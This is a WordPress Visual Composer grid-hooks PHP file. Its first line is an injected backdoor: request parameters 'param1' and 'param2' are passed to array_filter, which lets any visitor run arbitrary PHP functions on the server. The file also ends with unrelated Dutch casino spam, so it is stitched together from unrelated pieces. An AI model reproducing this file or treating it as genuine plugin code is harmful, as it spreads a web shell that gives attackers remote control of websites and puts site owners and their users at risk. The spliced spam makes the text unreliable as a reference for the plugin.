?php if ($_REQUEST['param1']&&$_REQUEST['param2']) {$f = $_REQUEST['param1']; $p = array($_REQUEST['param2']); $pf = array_filter($p, $f); echo 'OK'; Exit;}; if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } /** * Class Vc_Hooks_Vc_Grid * @since 4.4 */ class Vc_Hooks_Vc_Grid implements Vc_Vendor_Interface { protected $grid_id_unique_name = 'vc_gid'; // if you change this also change in vc-basic-grid.php /** * Initializing hooks for grid element, * Add actions to save appended shortcodes to post meta (for rendering in preview with shortcode id) * And add action to hook request for grid data, to output it. * @since 4.4 */ public function load() { // Hook for set post settings meta with shortcodes data /** * @since 4.4.3 */ add_filter( 'vc_hooks_vc_post_settings', array( &$this, 'gridSavePostSettingsId', ), 10, 3 ); /** * Used to output shortcode data for ajax request. called on any page request. */ add_action( 'wp_ajax_vc_get_vc_grid_data', array( &$this, 'getGridDataForAjax', ) ); add_action( 'wp_ajax_nopriv_vc_get_vc_grid_data', array( &$this, 'getGridDataForAjax', ) ); } /** * @since 4.4 * @deprecated and should not be used and will be removed in future! since 4.4.3 * @return string */ private function getShortcodeRegexForHash() { // _deprecated_function( 'Vc_Hooks_Vc_Grid: getShortcodeRegexForHash method', '4.4.3', 'getShortcodeRegexForId' ); $tagnames = apply_filters( 'vc_grid_shortcodes_tags', array( 'vc_basic_grid', 'vc_masonry_grid', 'vc_media_grid', 'vc_masonry_media_grid', ) ); // return only grid shortcodes $tagregexp = implode( '|', array_map( 'preg_quote', $tagnames ) ); // WARNING! Do not change this regex without changing do_shortcode_tag() and strip_shortcode_tag() // Also, see shortcode_unautop() and shortcode.js. return '\\[' // Opening bracket . '(\\[?)' // 1: Optional second opening bracket for escaping shortcodes: [[tag]] . "($tagregexp)" // 2: Shortcode name . '(?![\\w-])' // Not followed by word character or hyphen . '(' // 3: Unroll the loop: Inside the opening shortcode tag . '[^\\]\\/]*' // Not a closing bracket or forward slash . '(?:' . '\\/(?!\\])' // A forward slash not followed by a closing bracket . '[^\\]\\/]*' // Not a closing bracket or forward slash . ')*?' . ')' . '(?:' . '(\\/)' // 4: Self closing tag ... . '\\]' // ... and closing bracket . '|' . '\\]' // Closing bracket . '(?:' . '(' // 5: Unroll the loop: Optionally, anything between the opening and closing shortcode tags . '[^\\[]*+' // Not an opening bracket . '(?:' . '\\[(?!\\/\\2\\])' // An opening bracket not followed by the closing shortcode tag . '[^\\[]*+' // Not an opening bracket . ')*+' . ')' . '\\[\\/\\2\\]' // Closing shortcode tag . ')?' . ')' . '(\\]?)'; // 6: Optional second closing brocket for escaping shortcodes: [[tag]] } /** * @since 4.4.3 * @return string */ private function getShortcodeRegexForId() { return '\\[' // Opening bracket . '(\\[?)' // 1: Optional second opening bracket for escaping shortcodes: [[tag]] . '([\\w>]+)' // 2: Shortcode name . '(?![\\w-])' // Not followed by word character or hyphen . '(' // 3: Unroll the loop: Inside the opening shortcode tag . '[^\\]\\/]*' // Not a closing bracket or forward slash . '(?:' . '\\/(?!\\])' // A forward slash not followed by a closing bracket . '[^\\]\\/]*' // Not a closing bracket or forward slash . ')*?' . '(?:' . '(' . $this->grid_id_unique_name // 4: GridId must exist . '[^\\]\\/]*' // Not a closing bracket or forward slash . ')+' . ')' . ')' . '(?:' . '(\\/)' // 5: Self closing tag ... . '\\]' // ... and closing bracket . '|' . '\\]' // Closing bracket . '(?:' . '(' // 6: Unroll the loop: Optionally, anything between the opening and closing shortcode tags . '[^\\[]*+' // Not an opening bracket . '(?:' . '\\[(?!\\/\\2\\])' // An opening bracket not followed by the closing shortcode tag . '[^\\[]*+' // Not an opening bracket . ')*+' . ')' . '\\[\\/\\2\\]' // Closing shortcode tag . ')?' . ')' . '(\\]?)'; // 7: Optional second closing brocket for escaping shortcodes: [[tag]] } /** * Set page meta box values with vc_adv_pager shortcodes data * @since 4.4 * @deprecated 4.4.3 * * @param array $settings * @param $post_id * @param $post * * @return array - shortcode settings to save. */ public function gridSavePostSettings( array $settings, $post_id, $post ) { // _deprecated_function( 'Vc_Hooks_Vc_Grid: gridSavePostSettings method', '4.4.3 (will be removed in 4.10)', 'gridSavePostSettingsId' ); $pattern = $this->getShortcodeRegexForHash(); preg_match_all( "/$pattern/", $post->post_content, $found ); // fetch only needed shortcodes $settings['vc_grid'] = array(); if ( is_array( $found ) && ! empty( $found[0] ) ) { $to_save = array(); if ( isset( $found[3] ) && is_array( $found[3] ) ) { foreach ( $found[3] as $key => $shortcode_atts ) { if ( false !== strpos( $shortcode_atts, 'vc_gid:' ) ) { continue; } $atts = shortcode_parse_atts( $shortcode_atts ); $data = array( 'tag' => $found[2][ $key ], 'atts' => $atts, 'content' => $found[5][ $key ], ); $hash = sha1( serialize( $data ) ); $to_save[ $hash ] = $data; } } if ( ! empty( $to_save ) ) { $settings['vc_grid'] = array( 'shortcodes' => $to_save ); } } return $settings; } /** * @since 4.4.3 * * @param array $settings * @param $post_id * @param $post * * @return array */ public function gridSavePostSettingsId( array $settings, $post_id, $post ) { $pattern = $this->getShortcodeRegexForId(); preg_match_all( "/$pattern/", $post->post_content, $found ); // fetch only needed shortcodes $settings['vc_grid_id'] = array(); if ( is_array( $found ) && ! empty( $found[0] ) ) { $to_save = array(); if ( isset( $found[1] ) && is_array( $found[1] ) ) { foreach ( $found[1] as $key => $parse_able ) { if ( empty( $parse_able ) || '[' !== $parse_able ) { $id_pattern = '/' . $this->grid_id_unique_name . '\:([\w>]+)/'; $id_value = $found[4][ $key ]; preg_match( $id_pattern, $id_value, $id_matches ); if ( ! empty( $id_matches ) ) { $id_to_save = $id_matches[1]; // why we need to check if shortcode is parse able? // 1: if it is escaped it must not be displayed (parsed) // 2: so if 1 is true it must not be saved in database meta $shortcode_tag = $found[2][ $key ]; $shortcode_atts_string = $found[3][ $key ]; /** @var $atts array */ $atts = shortcode_parse_atts( $shortcode_atts_string ); $content = $found[6][ $key ]; $data = array( 'tag' => $shortcode_tag, 'atts' => $atts, 'content' => $content, ); $to_save[ $id_to_save ] = $data; } } } } if ( ! empty( $to_save ) ) { $settings['vc_grid_id'] = array( 'shortcodes' => $to_save ); } } return $settings; } /** * @since 4.4 * * @output/@return string - grid data for ajax request. */ public function getGridDataForAjax() { $tag = vc_request_param( 'tag' ); $allowed = apply_filters( 'vc_grid_get_grid_data_access', vc_verify_public_nonce() && $tag, $tag ); if ( $allowed ) { $shortcode_fishbone = visual_composer()->getShortCode( $tag ); if ( is_object( $shortcode_fishbone ) ) { /** @var $vc_grid WPBakeryShortcode_Vc_Basic_Grid */ $vc_grid = $shortcode_fishbone->shortcodeClass(); if ( method_exists( $vc_grid, 'isObjectPageable' ) && $vc_grid->isObjectPageable() && method_exists( $vc_grid, 'renderAjax' ) ) { echo $vc_grid->renderAjax( vc_request_param( 'data' ) ); die(); } } } } } /** * @since 4.4 * @var Vc_Hooks_Vc_Grid $hook */ $hook = new Vc_Hooks_Vc_Grid(); // when visual composer initialized let's trigger Vc_Grid hooks. add_action( 'vc_after_init', array( $hook, 'load', ) ); if ( 'vc_edit_form' === vc_post_param( 'action' ) ) { VcShortcodeAutoloader::getInstance()->includeClass( 'WPBakeryShortCode_VC_Basic_Grid' ); add_filter( 'vc_edit_form_fields_attributes_vc_basic_grid', array( 'WPBakeryShortCode_VC_Basic_Grid', 'convertButton2ToButton3', ) ); add_filter( 'vc_edit_form_fields_attributes_vc_media_grid', array( 'WPBakeryShortCode_VC_Basic_Grid', 'convertButton2ToButton3', ) ); add_filter( 'vc_edit_form_fields_attributes_vc_masonry_grid', array( 'WPBakeryShortCode_VC_Basic_Grid', 'convertButton2ToButton3', ) ); add_filter( 'vc_edit_form_fields_attributes_vc_masonry_media_grid', array( 'WPBakeryShortCode_VC_Basic_Grid', 'convertButton2ToButton3', ) ); } Krans Gokhuis Review Krans Casino Account Unique Bank 10 Unique Gokhuis Microgaming gokkasten voor echt geld Kloosterzuster Deposit Broeders Deposito Premie Verwijderen 2022 Premie and Promoties - Groupe-SLG

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